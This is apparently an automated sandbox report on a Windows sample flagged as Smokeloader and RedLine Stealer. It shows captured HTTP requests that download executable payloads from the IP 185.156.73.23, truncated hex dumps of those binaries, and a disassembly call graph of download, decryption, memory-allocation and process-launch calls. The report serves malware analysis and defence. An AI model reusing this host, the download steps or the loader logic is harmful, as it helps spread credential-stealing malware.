                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: d
                                                    Host: 185.156.73.23
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Dec 20, 2024 16:46:43.455174923 CET1236INHTTP/1.1 200 OK
                                                    Date: Fri, 20 Dec 2024 15:46:42 GMT
                                                    Server: Apache/2.4.52 (Ubuntu)
                                                    Content-Disposition: attachment; filename="dll";
                                                    Content-Length: 242176
                                                    Keep-Alive: timeout=5, max=86
                                                    Connection: Keep-Alive
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                    Dec 20, 2024 16:46:43.966885090 CET394OUTGET /soft/download HTTP/1.1
                                                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                    User-Agent: s
                                                    Host: 185.156.73.23
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache
                                                    Dec 20, 2024 16:46:44.708875895 CET1236INHTTP/1.1 200 OK
                                                    Date: Fri, 20 Dec 2024 15:46:44 GMT
                                                    Server: Apache/2.4.52 (Ubuntu)
                                                    Content-Disposition: attachment; filename="soft";
                                                    Content-Length: 1502720
                                                    Keep-Alive: timeout=5, max=85
                                                    Connection: Keep-Alive
                                                    Content-Type: application/octet-stream
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:4
                                                    Start time:10:45:48
                                                    Start date:20/12/2024
                                                    Path:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\tXEKP1ThBP.exe"
                                                    Imagebase:0x400000
                                                    File size:1'885'184 bytes
                                                    MD5 hash:6D81636AF92FAE98C45898823E103E4F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:12
                                                    Start time:12:44:40
                                                    Start date:20/12/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 1724
                                                    Imagebase:0x330000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2.4%
                                                      Dynamic/Decrypted Code Coverage:20.1%
                                                      Signature Coverage:11.6%
                                                      Total number of Nodes:1103
                                                      Total number of Limit Nodes:23
                                                      execution_graph 37596 10001f20 37639 10005956 GetSystemTimeAsFileTime 37596->37639 37598 10001f48 37641 100059d5 37598->37641 37600 10001f4f __FrameHandler3::FrameUnwindToState 37644 10001523 37600->37644 37605 10002174 37674 100010a3 37605->37674 37606 10002025 37677 10001cdd 49 API calls __EH_prolog3_GS 37606->37677 37610 1000202e 37611 10002164 37610->37611 37678 100059b4 37 API calls _unexpected 37610->37678 37613 10001bb9 25 API calls 37611->37613 37615 10002172 37613->37615 37614 10002040 37679 10001c33 39 API calls 37614->37679 37615->37605 37617 10002052 37680 10002493 27 API calls __InternalCxxFrameHandler 37617->37680 37619 1000205f 37681 10002230 27 API calls __InternalCxxFrameHandler 37619->37681 37621 10002079 37682 10002230 27 API calls __InternalCxxFrameHandler 37621->37682 37623 1000209f 37683 1000219f 27 API calls __InternalCxxFrameHandler 37623->37683 37625 100020a9 37684 10001bb9 37625->37684 37628 10001bb9 25 API calls 37629 100020bb 37628->37629 37630 10001bb9 25 API calls 37629->37630 37631 100020c4 37630->37631 37688 10001725 8 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37631->37688 37633 100020df __FrameHandler3::FrameUnwindToState 37634 10002100 CreateProcessA 37633->37634 37635 10002135 37634->37635 37636 1000213c ShellExecuteA 37634->37636 37635->37636 37637 1000215b 37635->37637 37636->37637 37638 10001bb9 25 API calls 37637->37638 37638->37611 37640 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 37639->37640 37640->37598 37689 10006e9c GetLastError 37641->37689 37645 1000152f __EH_prolog3_GS 37644->37645 37734 1000184b 37645->37734 37647 10001541 37650 10001593 37647->37650 37657 1000179a 27 API calls 37647->37657 37649 100015ff 37743 1000179a 37649->37743 37738 1000190a 37650->37738 37652 1000160d 37748 10005939 37652->37748 37655 10001650 InternetSetOptionA InternetConnectA 37659 10001692 HttpOpenRequestA 37655->37659 37660 100016e8 InternetCloseHandle 37655->37660 37656 100016eb 37658 10001704 37656->37658 37797 10001bdc 25 API calls 37656->37797 37657->37650 37662 10001bb9 25 API calls 37658->37662 37663 100016e2 InternetCloseHandle 37659->37663 37664 100016bc 37659->37664 37660->37656 37665 1000171b 37662->37665 37663->37660 37751 100010c7 37664->37751 37798 1000e8a5 37665->37798 37670 100016d3 37765 10001175 37670->37765 37671 100016df InternetCloseHandle 37671->37663 37675 100010ad 37674->37675 37676 100010bd CoUninitialize 37675->37676 37677->37610 37678->37614 37679->37617 37680->37619 37681->37621 37682->37623 37683->37625 37685 10001bc4 37684->37685 37686 10001bcc 37684->37686 37849 10001bdc 25 API calls 37685->37849 37686->37628 37688->37633 37690 10006eb3 37689->37690 37691 10006eb9 37689->37691 37719 10007580 6 API calls _unexpected 37690->37719 37695 10006ebf SetLastError 37691->37695 37720 100075bf 6 API calls _unexpected 37691->37720 37694 10006ed7 37694->37695 37696 10006edb 37694->37696 37702 10006f53 37695->37702 37703 100059df 37695->37703 37721 10007aa7 14 API calls 2 library calls 37696->37721 37699 10006ee7 37700 10006f06 37699->37700 37701 10006eef 37699->37701 37729 100075bf 6 API calls _unexpected 37700->37729 37722 100075bf 6 API calls _unexpected 37701->37722 37732 10006928 37 API calls __FrameHandler3::FrameUnwindToState 37702->37732 37703->37600 37707 10006f12 37710 10006f16 37707->37710 37711 10006f27 37707->37711 37708 10006efd 37723 10007a3c 37708->37723 37730 100075bf 6 API calls _unexpected 37710->37730 37731 10006c9e 14 API calls _unexpected 37711->37731 37715 10006f32 37717 10007a3c _free 14 API calls 37715->37717 37716 10006f03 37716->37695 37718 10006f39 37717->37718 37718->37695 37719->37691 37720->37694 37721->37699 37722->37708 37724 10007a70 __dosmaperr 37723->37724 37725 10007a47 RtlFreeHeap 37723->37725 37724->37716 37725->37724 37726 10007a5c 37725->37726 37733 10005926 14 API calls __dosmaperr 37726->37733 37728 10007a62 GetLastError 37728->37724 37729->37707 37730->37708 37731->37715 37733->37728 37735 10001868 37734->37735 37735->37735 37736 1000190a 27 API calls 37735->37736 37737 1000187c 37736->37737 37737->37647 37739 10001978 37738->37739 37742 10001920 __InternalCxxFrameHandler 37738->37742 37801 10001a59 27 API calls std::_Xinvalid_argument 37739->37801 37742->37649 37744 100017eb 37743->37744 37745 100017b3 __InternalCxxFrameHandler 37743->37745 37802 10001884 27 API calls 37744->37802 37745->37652 37803 100070ee 37748->37803 37752 100010d3 __EH_prolog3_GS 37751->37752 37753 1000184b 27 API calls 37752->37753 37754 100010e3 HttpAddRequestHeadersA 37753->37754 37829 100017f1 37754->37829 37756 10001112 HttpAddRequestHeadersA 37757 100017f1 27 API calls 37756->37757 37758 10001132 HttpAddRequestHeadersA 37757->37758 37759 100017f1 27 API calls 37758->37759 37760 10001152 HttpAddRequestHeadersA 37759->37760 37761 10001bb9 25 API calls 37760->37761 37762 1000116d 37761->37762 37763 1000e8a5 5 API calls 37762->37763 37764 10001172 HttpSendRequestA 37763->37764 37764->37670 37764->37671 37767 10001184 __EH_prolog3_GS 37765->37767 37766 100011c5 InternetSetFilePointer 37768 100011e3 InternetReadFile 37766->37768 37767->37766 37769 1000121d __InternalCxxFrameHandler 37768->37769 37769->37768 37770 10001260 __FrameHandler3::FrameUnwindToState 37769->37770 37771 1000127d HttpQueryInfoA 37770->37771 37772 100012a6 CoCreateInstance 37771->37772 37773 1000150a 37771->37773 37772->37773 37774 100012d8 37772->37774 37775 1000e8a5 5 API calls 37773->37775 37774->37773 37777 1000184b 27 API calls 37774->37777 37776 10001520 37775->37776 37776->37671 37778 100012f7 37777->37778 37834 10001006 30 API calls 37778->37834 37780 1000130c 37781 10001bb9 25 API calls 37780->37781 37788 1000134f __FrameHandler3::FrameUnwindToState 37781->37788 37782 1000149d 37838 10005926 14 API calls __dosmaperr 37782->37838 37783 100014ae __InternalCxxFrameHandler 37783->37773 37784 10001427 __InternalCxxFrameHandler 37784->37782 37784->37783 37787 100014aa __FrameHandler3::FrameUnwindToState 37784->37787 37786 100014a2 37840 1000584c 25 API calls __strnicoll 37786->37840 37787->37783 37839 10005926 14 API calls __dosmaperr 37787->37839 37788->37783 37788->37784 37791 10001456 37788->37791 37792 10001449 37788->37792 37791->37784 37836 10005926 14 API calls __dosmaperr 37791->37836 37835 10005926 14 API calls __dosmaperr 37792->37835 37794 1000144e 37837 1000584c 25 API calls __strnicoll 37794->37837 37797->37658 37841 100026ff 37798->37841 37800 10001722 37800->37605 37800->37606 37807 10007102 37803->37807 37804 10007106 37820 10001629 InternetOpenA 37804->37820 37822 10005926 14 API calls __dosmaperr 37804->37822 37806 10007130 37823 1000584c 25 API calls __strnicoll 37806->37823 37807->37804 37809 10007140 37807->37809 37807->37820 37824 100069d1 37 API calls 2 library calls 37809->37824 37811 1000714c 37812 10007156 37811->37812 37816 1000716d 37811->37816 37825 1000a31e 25 API calls 2 library calls 37812->37825 37814 100071ef 37814->37820 37826 10005926 14 API calls __dosmaperr 37814->37826 37815 10007244 37815->37820 37828 10005926 14 API calls __dosmaperr 37815->37828 37816->37814 37816->37815 37819 10007238 37827 1000584c 25 API calls __strnicoll 37819->37827 37820->37655 37820->37656 37822->37806 37823->37820 37824->37811 37825->37820 37826->37819 37827->37820 37828->37820 37831 100017ff 37829->37831 37830 1000180d __InternalCxxFrameHandler 37830->37756 37831->37830 37833 1000188f 27 API calls __InternalCxxFrameHandler 37831->37833 37833->37830 37834->37780 37835->37794 37836->37794 37837->37784 37838->37786 37839->37786 37840->37783 37842 10002707 37841->37842 37843 10002708 IsProcessorFeaturePresent 37841->37843 37842->37800 37845 10002b1c 37843->37845 37848 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37845->37848 37847 10002bff 37847->37800 37848->37847 37849->37686 37850 4034c0 CryptAcquireContextW 37851 40360a GetLastError CryptReleaseContext 37850->37851 37852 40354e CryptCreateHash 37850->37852 37853 403754 37851->37853 37852->37851 37854 403572 37852->37854 37855 40377a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37853->37855 37857 4037a2 37853->37857 37874 409035 37854->37874 37899 408ec2 37855->37899 37906 40c26f 37857->37906 37859 40379e 37861 4035aa 37888 40e46b 37861->37888 37865 4035e6 CryptDeriveKey 37865->37851 37867 403625 37865->37867 37866 4035d8 GetLastError 37866->37853 37892 40e2bd 37867->37892 37869 40362b __InternalCxxFrameHandler 37870 409035 27 API calls 37869->37870 37872 40364a __InternalCxxFrameHandler 37870->37872 37871 403748 CryptDestroyKey 37871->37853 37872->37871 37873 4036bc CryptDecrypt 37872->37873 37873->37871 37873->37872 37876 408ff7 37874->37876 37875 40e2bd ___std_exception_copy 15 API calls 37875->37876 37876->37875 37877 409016 37876->37877 37879 409018 37876->37879 37913 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 37876->37913 37877->37861 37880 401600 Concurrency::cancel_current_task 37879->37880 37881 409022 37879->37881 37911 40a370 RaiseException 37880->37911 37914 40a370 RaiseException 37881->37914 37884 40161c 37912 40a131 26 API calls ___std_exception_copy 37884->37912 37885 4097b1 37887 401643 37887->37861 37889 40e479 37888->37889 37915 40e2c8 37889->37915 37897 41249e __dosmaperr 37892->37897 37893 4124dc 37953 40c339 14 API calls __dosmaperr 37893->37953 37895 4124c7 RtlAllocateHeap 37896 4124da 37895->37896 37895->37897 37896->37869 37897->37893 37897->37895 37952 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 37897->37952 37900 408eca 37899->37900 37901 408ecb IsProcessorFeaturePresent 37899->37901 37900->37859 37903 408f12 37901->37903 37954 408ed5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37903->37954 37905 408ff5 37905->37859 37955 40c1fb 25 API calls 2 library calls 37906->37955 37908 40c27e 37956 40c28c 11 API calls __FrameHandler3::FrameUnwindToState 37908->37956 37910 40c28b 37911->37884 37912->37887 37913->37876 37914->37885 37916 40e2df 37915->37916 37917 40e2f1 37916->37917 37918 40e309 37916->37918 37929 4035bc CryptHashData 37916->37929 37942 40c339 14 API calls __dosmaperr 37917->37942 37944 40c369 37 API calls 2 library calls 37918->37944 37921 40e2f6 37943 40c25f 25 API calls __cftof 37921->37943 37922 40e314 37924 40e341 37922->37924 37925 40e322 37922->37925 37927 40e413 37924->37927 37928 40e349 37924->37928 37945 413393 19 API calls 2 library calls 37925->37945 37927->37929 37950 4132ab MultiByteToWideChar 37927->37950 37928->37929 37946 4132ab MultiByteToWideChar 37928->37946 37929->37865 37929->37866 37932 40e38b 37932->37929 37934 40e396 GetLastError 37932->37934 37933 40e43d 37933->37929 37951 40c339 14 API calls __dosmaperr 37933->37951 37940 40e3f6 37934->37940 37941 40e3a1 37934->37941 37937 40e3e0 37948 4132ab MultiByteToWideChar 37937->37948 37940->37929 37949 40c339 14 API calls __dosmaperr 37940->37949 37941->37937 37941->37940 37947 413271 37 API calls 2 library calls 37941->37947 37942->37921 37943->37929 37944->37922 37945->37929 37946->37932 37947->37941 37948->37940 37949->37929 37950->37933 37951->37929 37952->37897 37953->37896 37954->37905 37955->37908 37956->37910 37957 4020c0 37958 40213b 37957->37958 37959 4020dd 37957->37959 37961 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37958->37961 37959->37958 37960 4020e3 CreateFileA 37959->37960 37960->37958 37962 402103 WriteFile CloseHandle 37960->37962 37963 402149 37961->37963 37964 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37962->37964 37965 402135 37964->37965 37966 401880 37967 4018e9 InternetSetFilePointer InternetReadFile 37966->37967 37968 40197d __cftof 37967->37968 37969 4019a2 HttpQueryInfoA 37968->37969 37970 401d25 37969->37970 37971 4019c6 CoCreateInstance 37969->37971 37972 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37970->37972 37971->37970 37974 4019ff 37971->37974 37973 401d50 37972->37973 37974->37970 37994 402470 37974->37994 37976 401a5c MultiByteToWideChar 37977 409035 27 API calls 37976->37977 37978 401aae MultiByteToWideChar 37977->37978 37979 401b10 37978->37979 37979->37979 38009 402310 27 API calls 3 library calls 37979->38009 37981 401b2c 37982 401c00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37981->37982 37983 401d56 37981->37983 37985 409035 27 API calls 37982->37985 37987 401cf1 37982->37987 37984 40c26f 25 API calls 37983->37984 37986 401d5b 37984->37986 37988 401c37 37985->37988 37987->37970 37988->37987 37989 409035 27 API calls 37988->37989 37993 401cc4 37988->37993 37990 401cb4 37989->37990 38010 4014b0 25 API calls 3 library calls 37990->38010 38011 4014b0 25 API calls 3 library calls 37993->38011 37997 40248e __InternalCxxFrameHandler 37994->37997 37999 4024b4 37994->37999 37995 40259e 38014 4016a0 27 API calls std::_Xinvalid_argument 37995->38014 37997->37976 37998 4025a3 38015 401600 27 API calls 3 library calls 37998->38015 37999->37995 38001 402508 37999->38001 38002 40252d 37999->38002 38001->37998 38012 401600 27 API calls 4 library calls 38001->38012 38006 402519 __InternalCxxFrameHandler 38002->38006 38013 401600 27 API calls 4 library calls 38002->38013 38003 4025a8 38007 40c26f 25 API calls 38006->38007 38008 402580 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38006->38008 38007->37995 38008->37976 38009->37981 38010->37993 38011->37987 38012->38006 38013->38006 38015->38003 38016 40e268 38019 411ac2 38016->38019 38018 40e280 38020 411af6 __dosmaperr 38019->38020 38021 411acd RtlFreeHeap 38019->38021 38020->38018 38021->38020 38022 411ae2 38021->38022 38025 40c339 14 API calls __dosmaperr 38022->38025 38024 411ae8 GetLastError 38024->38020 38025->38024 38026 cfad26 38027 cfad35 38026->38027 38030 cfb4c6 38027->38030 38036 cfb4e1 38030->38036 38031 cfb4ea CreateToolhelp32Snapshot 38032 cfb506 Module32First 38031->38032 38031->38036 38033 cfb515 38032->38033 38035 cfad3e 38032->38035 38037 cfb185 38033->38037 38036->38031 38036->38032 38038 cfb1b0 38037->38038 38039 cfb1f9 38038->38039 38040 cfb1c1 VirtualAlloc 38038->38040 38039->38039 38040->38039 38041 4b1003c 38042 4b10049 38041->38042 38056 4b10e0f SetErrorMode SetErrorMode 38042->38056 38047 4b10265 38048 4b102ce VirtualProtect 38047->38048 38050 4b1030b 38048->38050 38049 4b10439 VirtualFree 38054 4b105f4 LoadLibraryA 38049->38054 38055 4b104be 38049->38055 38050->38049 38051 4b104e3 LoadLibraryA 38051->38055 38053 4b108c7 38054->38053 38055->38051 38055->38054 38057 4b10223 38056->38057 38058 4b10d90 38057->38058 38059 4b10dad 38058->38059 38060 4b10dbb GetPEB 38059->38060 38061 4b10238 VirtualAlloc 38059->38061 38060->38061 38061->38047 38062 100079ee 38063 10007a2c 38062->38063 38067 100079fc _unexpected 38062->38067 38070 10005926 14 API calls __dosmaperr 38063->38070 38065 10007a17 RtlAllocateHeap 38066 10007a2a 38065->38066 38065->38067 38067->38063 38067->38065 38069 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 38067->38069 38069->38067 38070->38066 38071 402c70 38072 402c94 SetLastError 38071->38072 38073 402cbc 38071->38073 38149 402920 71 API calls 38072->38149 38075 402cc6 38073->38075 38077 402d01 SetLastError 38073->38077 38085 402d29 38073->38085 38150 402920 71 API calls 38075->38150 38076 402ca6 38078 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38076->38078 38151 402920 71 API calls 38077->38151 38081 402cb8 38078->38081 38082 402cd0 SetLastError 38086 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38082->38086 38083 402d13 38084 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38083->38084 38087 402d25 38084->38087 38085->38075 38088 402d94 GetNativeSystemInfo 38085->38088 38089 402ced 38086->38089 38088->38075 38090 402dc3 VirtualAlloc 38088->38090 38091 402e03 GetProcessHeap HeapAlloc 38090->38091 38092 402ddd VirtualAlloc 38090->38092 38093 402e20 VirtualFree 38091->38093 38094 402e34 38091->38094 38092->38091 38095 402def 38092->38095 38093->38094 38097 402e7c SetLastError 38094->38097 38098 402e9e VirtualAlloc 38094->38098 38152 402920 71 API calls 38095->38152 38100 402e84 38097->38100 38107 402eb7 __InternalCxxFrameHandler __cftof 38098->38107 38099 402df9 38099->38091 38153 4033d0 16 API calls ___std_exception_copy 38100->38153 38102 402e8b 38103 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38102->38103 38104 402e9a 38103->38104 38106 40303c 38106->38100 38109 403165 38106->38109 38134 402950 38106->38134 38107->38097 38107->38100 38108 402f9c 38107->38108 38125 402bf0 VirtualAlloc 38107->38125 38126 402a80 38108->38126 38110 402950 77 API calls 38109->38110 38111 403176 38110->38111 38111->38100 38115 40317e 38111->38115 38113 40320a 38116 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38113->38116 38114 4031ba 38117 4031f4 38114->38117 38118 4031c5 38114->38118 38115->38113 38115->38114 38120 403220 38116->38120 38119 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38117->38119 38122 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38118->38122 38121 403206 38119->38121 38123 4031f0 38122->38123 38125->38107 38127 402aa0 38126->38127 38128 402bdc 38126->38128 38127->38128 38129 402bcb SetLastError 38127->38129 38130 402bae SetLastError 38127->38130 38132 402b8f SetLastError 38127->38132 38128->38106 38129->38106 38130->38106 38132->38106 38135 402969 38134->38135 38144 4029a5 38134->38144 38136 4029be VirtualProtect 38135->38136 38139 402974 38135->38139 38138 402a02 GetLastError FormatMessageA 38136->38138 38136->38144 38137 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38140 4029ba 38137->38140 38141 402a27 38138->38141 38139->38144 38154 402c10 VirtualFree 38139->38154 38140->38106 38141->38141 38142 402a2e LocalAlloc 38141->38142 38155 4028e0 69 API calls 38142->38155 38144->38137 38145 402a51 OutputDebugStringA LocalFree LocalFree 38146 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38145->38146 38147 402a77 38146->38147 38147->38106 38149->38076 38150->38082 38151->38083 38152->38099 38153->38102 38154->38144 38155->38145 38156 99812b LoadLibraryA 38157 999d30 38156->38157 38158 999d2a 38159 999d33 38158->38159 38160 999d8c RegOpenKeyA 38159->38160 38161 999d65 RegOpenKeyA 38159->38161 38163 999da9 38160->38163 38161->38160 38162 999d82 38161->38162 38162->38160 38164 998ef6 38163->38164 38165 999ded GetNativeSystemInfo 38163->38165 38165->38164 38166 10005bf4 38167 10007a3c _free 14 API calls 38166->38167 38168 10005c0c 38167->38168 38169 a90b1c 38170 a90b2a VirtualProtect 38169->38170 38171 a90ae1 38169->38171 38173 a90b8f 38170->38173 38174 40955c 38175 409568 __FrameHandler3::FrameUnwindToState 38174->38175 38202 4092bc 38175->38202 38177 40956f 38178 4096c2 38177->38178 38186 409599 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 38177->38186 38230 4097b2 4 API calls 2 library calls 38178->38230 38180 4096c9 38231 40f00b 38180->38231 38184 4096d7 38185 4095b8 38186->38185 38187 409639 38186->38187 38226 40efe5 37 API calls 3 library calls 38186->38226 38210 4098cd 38187->38210 38203 4092c5 38202->38203 38235 4099b3 IsProcessorFeaturePresent 38203->38235 38205 4092d1 38236 40ab6a 10 API calls 2 library calls 38205->38236 38207 4092d6 38208 4092da 38207->38208 38237 40ab89 7 API calls 2 library calls 38207->38237 38208->38177 38238 40aa10 38210->38238 38213 40963f 38214 410b89 38213->38214 38240 4167a2 38214->38240 38216 409647 38219 408020 38216->38219 38218 410b92 38218->38216 38246 416a47 37 API calls 38218->38246 38220 402470 27 API calls 38219->38220 38221 408055 38220->38221 38222 402470 27 API calls 38221->38222 38223 40807a 38222->38223 38249 4055c0 38223->38249 38226->38187 38230->38180 38982 40eea9 38231->38982 38234 40efcf 23 API calls __FrameHandler3::FrameUnwindToState 38234->38184 38235->38205 38236->38207 38237->38208 38239 4098e0 GetStartupInfoW 38238->38239 38239->38213 38241 4167dd 38240->38241 38242 4167ab 38240->38242 38241->38218 38247 4112ba 37 API calls 3 library calls 38242->38247 38244 4167ce 38248 4165e9 47 API calls 3 library calls 38244->38248 38246->38218 38247->38244 38248->38241 38668 40f20b 38249->38668 38254 402470 27 API calls 38255 40564e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38254->38255 38256 402470 27 API calls 38255->38256 38283 4056b9 __cftof std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38255->38283 38256->38283 38257 40c26f 25 API calls 38257->38283 38259 409035 27 API calls 38259->38283 38260 405a91 38674 4064d0 38260->38674 38263 405ab2 38684 4022d0 38263->38684 38264 402470 27 API calls 38264->38283 38267 405ac2 38688 402200 38267->38688 38271 405ad6 38272 405bab 38271->38272 38273 405ade 38271->38273 38800 406770 39 API calls 2 library calls 38272->38800 38277 405af1 38273->38277 38278 405b4e 38273->38278 38276 405bb0 38284 4022d0 27 API calls 38276->38284 38790 406550 39 API calls 2 library calls 38277->38790 38795 406660 39 API calls 2 library calls 38278->38795 38279 405a45 Sleep 38279->38283 38282 405af6 38287 4022d0 27 API calls 38282->38287 38283->38257 38283->38259 38283->38260 38283->38264 38283->38279 38290 405a6a 38283->38290 38298 405a51 38283->38298 38301 405a3b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38283->38301 38755 40f158 41 API calls 38283->38755 38756 409170 6 API calls 38283->38756 38757 409482 28 API calls 38283->38757 38758 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38283->38758 38759 408a60 38283->38759 38764 401d60 38283->38764 38286 405bc0 38284->38286 38285 405b53 38288 4022d0 27 API calls 38285->38288 38291 402200 25 API calls 38286->38291 38289 405b06 38287->38289 38292 405b63 38288->38292 38791 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38289->38791 38788 408440 27 API calls 38290->38788 